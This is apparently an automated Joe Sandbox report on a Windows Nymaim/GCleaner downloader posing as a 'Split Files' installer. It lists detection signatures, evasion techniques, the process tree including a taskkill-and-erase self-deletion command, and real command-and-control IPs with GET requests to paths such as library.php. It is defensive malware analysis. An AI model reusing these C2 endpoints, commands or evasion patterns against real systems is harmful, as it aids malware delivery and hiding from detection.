Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:778228
MD5:e0f8085c7cb8eb9cf1c263bb12cfc6df
SHA1:a109ebcf251a1e69923c60330994190e40ab466c
SHA256:a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
Tags:exe
Infos:

Detection

Nymaim
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 2148 cmdline: C:\Users\user\Desktop\file.exe MD5: E0F8085C7CB8EB9CF1C263BB12CFC6DF)
    • is-DTRND.tmp (PID: 6048 cmdline: "C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496 MD5: E8176050192FBB976D70238E3C121F4C)
      • SplitFiles131.exe (PID: 4360 cmdline: "C:\Program Files (x86)\Split Files\SplitFiles131.exe" MD5: 361518D6CC3C25EEC2DFC1DE82B055B2)
        • KN38AzDG.exe (PID: 1960 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)
        • cmd.exe (PID: 1876 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 5224 cmdline: taskkill /im "SplitFiles131.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup
{"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        SourceRuleDescriptionAuthorStrings
        5.2.SplitFiles131.exe.3340000.3.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          5.2.SplitFiles131.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            5.2.SplitFiles131.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              5.2.SplitFiles131.exe.3340000.3.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                No Sigma rule has matched
                Timestamp:107.182.129.235192.168.2.580497062852925 01/05/23-08:47:10.017687
                SID:2852925
                Source Port:80
                Destination Port:49706
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.545.139.105.17149705802041920 01/05/23-08:47:09.800462
                SID:2041920
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5107.182.129.23549706802852981 01/05/23-08:47:09.990287
                SID:2852981
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.5107.182.129.23549706802852980 01/05/23-08:47:09.925610
                SID:2852980
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://171.22.30.106/library.phpURL Reputation: Label: malware
                Source: http://171.22.30.106/library.phpchAvira URL Cloud: Label: malware
                Source: http://171.22.30.106/library.phpYQAvira URL Cloud: Label: malware
                Source: http://171.22.30.106/library.php4Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeReversingLabs: Detection: 50%
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeJoe Sandbox ML: detected
                Source: 5.2.SplitFiles131.exe.10000000.6.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                Source: 1.2.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 1.0.file.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 5.2.SplitFiles131.exe.400000.0.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_10001000 ISCryptGetVersion,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_10001130 ArcFourCrypt,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

                Compliance

                barindex
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeUnpacked PE file: 5.2.SplitFiles131.exe.400000.0.unpack
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045157C FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0048AC5C FindFirstFileA,6CAD69D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exeCode function: 6_2_00104A1A FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\

                Networking

                barindex
                Source: TrafficSnort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.5:49705 -> 45.139.105.171:80
                Source: TrafficSnort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
                Source: TrafficSnort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.5:49706
                Source: Malware configuration extractorIPs: 45.139.105.1
                Source: Malware configuration extractorIPs: 85.31.46.167
                Source: Malware configuration extractorIPs: 107.182.129.235
                Source: Malware configuration extractorIPs: 171.22.30.106
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewIP Address: 45.139.105.171 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 45.139.105.171
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: unknownTCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.327425336.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php
                Source: SplitFiles131.exe, 00000005.00000003.332714577.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.327425336.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php4
                Source: SplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.phpYQ
                Source: SplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.phpch
                Source: is-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-3OAED.tmp.4.dr, is-FBKGV.tmp.4.drString found in binary or memory: http://rus.altarsoft.com/split_files.shtml
                Source: is-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-8E2LT.tmp.4.dr, is-7O3KV.tmp.4.dr, is-R2P47.tmp.4.dr, is-JMARM.tmp.4.dr, is-B20UO.tmp.4.dr, is-UJJ0L.tmp.4.dr, is-JSP8F.tmp.4.dr, is-79U67.tmp.4.dr, is-APJVT.tmp.4.dr, is-7L4JB.tmp.4.drString found in binary or memory: http://www.altarsoft.com/split_files.shtml
                Source: file.exeString found in binary or memory: http://www.innosetup.com
                Source: is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                Source: file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drString found in binary or memory: http://www.innosetup.comDVarFileInfo$
                Source: file.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drString found in binary or memory: http://www.remobjects.com/?ps
                Source: file.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.drString found in binary or memory: http://www.remobjects.com/?psU
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: global trafficHTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                Source: file.exe, 00000001.00000002.376583060.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.3340000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SplitFiles131.exe.3340000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00408280
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00468C28
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00461280
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0043DE40
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004302D0
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004445B8
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00434864
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0047AA90
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00444B60
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0045ADE0
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00480F94
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00445258
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_004132E1
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00463288
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00435568
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00445664
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_0042F874
                Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmpCode function: 4_2_00457F04
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404490
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004096F0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004056A0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00406800
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00406AA0
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404D40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00405F40
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00402F20
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004150D3
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00415305
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_004223A9
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00419510
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00404840
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 5_2_00426850
